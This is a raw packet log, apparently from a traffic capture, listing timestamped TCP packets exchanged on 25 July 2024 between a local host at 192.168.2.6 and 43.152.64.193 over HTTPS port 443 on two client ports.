Jul 25, 2024 11:25:49.818391085 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.818445921 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.818475008 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.824291945 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.824316025 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.824409962 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.824434042 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.824501991 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.824501991 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.825362921 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.825453997 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.825479984 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.825563908 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.826148033 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.826244116 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.826266050 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.826318979 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.827064991 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.827088118 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.827137947 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.827157974 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.827182055 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.827295065 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.834353924 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.834376097 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.835324049 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.835355997 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.835427999 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.837323904 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.837342978 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.837460041 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.837487936 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.837548971 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.902617931 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.902688980 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.902704000 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.902734041 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.902757883 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.902820110 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.903234959 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.903305054 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.903311968 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.903467894 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.938694954 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.938797951 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.938828945 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.939136982 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.947751999 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.947777987 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.947877884 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.947887897 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.947938919 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.955518961 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.955540895 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.955611944 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.955632925 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.955683947 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.955683947 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.959157944 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.959253073 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.959269047 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.959377050 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.959515095 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.959536076 CEST	443	49716	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:49.959582090 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:49.959582090 CEST	49716	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:50.091706991 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:50.091747999 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:50.091882944 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:50.092169046 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:50.092175961 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:51.658005953 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:51.658116102 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:51.658588886 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:51.658600092 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:51.658821106 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:51.658827066 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.049993038 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.050056934 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.050206900 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.050237894 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.050312042 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.050312042 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.054673910 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.054902077 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.054913044 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.055207968 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.134609938 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.134813070 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.134839058 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.135078907 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.137958050 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.138057947 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.138070107 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.138323069 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.139964104 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.140057087 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.140064955 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.140189886 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.141942024 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.142064095 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.142071009 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.142266989 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.144623995 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.144767046 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.144773960 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.144958973 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.221324921 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.221524000 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.221544981 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.222919941 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.223028898 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.223042965 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.223277092 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.224656105 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.224762917 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.224771976 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.224858046 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.224973917 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.225119114 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.225126982 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.225828886 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.226674080 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.226763010 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.226775885 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.228864908 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.230016947 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.230036020 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.230153084 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.230174065 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.233948946 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.308682919 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.308706999 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.308792114 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.308814049 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.309005976 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.309792042 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.309808969 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.309948921 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.309948921 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.309957027 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.310235023 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.310926914 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.310971975 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.311000109 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.311007977 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.311062098 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.311062098 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.312385082 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.312408924 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.312446117 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.312453985 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.312495947 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.312505960 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.312505960 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.312515020 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.312576056 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.312576056 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.314868927 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.314966917 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.314974070 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.315299988 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.315350056 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.315417051 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.315423012 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.315479040 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.317738056 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.317822933 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.317830086 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.317954063 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.322532892 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.322662115 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.322678089 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.322745085 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.327543974 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.327698946 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.327713966 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.327768087 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.332313061 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.332406044 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.332412958 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.332509041 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.340547085 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.340570927 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.340620041 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.340627909 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.340683937 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.340683937 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.395423889 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.395452976 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.395528078 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.395536900 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.395596981 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.395625114 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.395956039 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.395973921 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.396027088 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.396034002 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.396121025 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.397733927 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.397810936 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.397850990 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.397856951 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.397903919 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.397903919 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.399471045 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.399494886 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.399527073 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.399552107 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.399558067 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.399630070 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.399630070 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.400264978 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.400335073 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.400341988 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.400505066 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.406105995 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.406124115 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.406194925 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.406203985 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.406322002 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.411267042 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.411344051 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.411350965 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.411438942 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.415978909 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.416142941 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.416150093 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.416313887 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.424856901 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.424877882 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.424951077 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.424959898 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.425055027 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.482126951 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.482155085 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.482290030 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.482317924 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.482714891 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.528758049 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.528793097 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.528868914 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.528891087 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.528933048 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.528933048 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.536353111 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.536403894 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.536434889 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.536441088 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.536514997 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.536514997 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.545474052 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.545495033 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.545542002 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.545551062 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.545610905 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.545610905 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.550719023 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.550813913 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.550828934 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.554853916 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.558985949 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.559014082 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.559180975 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.559191942 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.562839985 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.563158989 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.563235044 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.563241959 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.565299034 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.567451000 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.567650080 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.567656994 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.567826986 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.576695919 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.576720953 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.576838017 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.576848984 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.576981068 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.590186119 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.590205908 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.590303898 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.590303898 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.590337992 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.590380907 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.609467030 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.609507084 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.609729052 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.609729052 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.609757900 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.614860058 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.620716095 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.620759964 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.620858908 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.620872974 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.620883942 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.620922089 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.626331091 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.626357079 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.626441956 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.626451015 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.626590014 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.630685091 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.630765915 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.630791903 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.631031036 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.636058092 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.636205912 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.636234045 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.638849974 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.639354944 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.639442921 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.639458895 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.641113997 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.643754005 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.644340038 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.644364119 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.646831036 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.649585009 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.649893045 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.649913073 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.653073072 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.653187990 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.653251886 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.653268099 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.657258987 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.664488077 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.664520025 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.664613962 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.664623976 CEST	443	49720	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:52.664643049 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.664671898 CEST	49720	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:52.674701929 CEST	443	49720	43.152.64.193	192.168.2.6
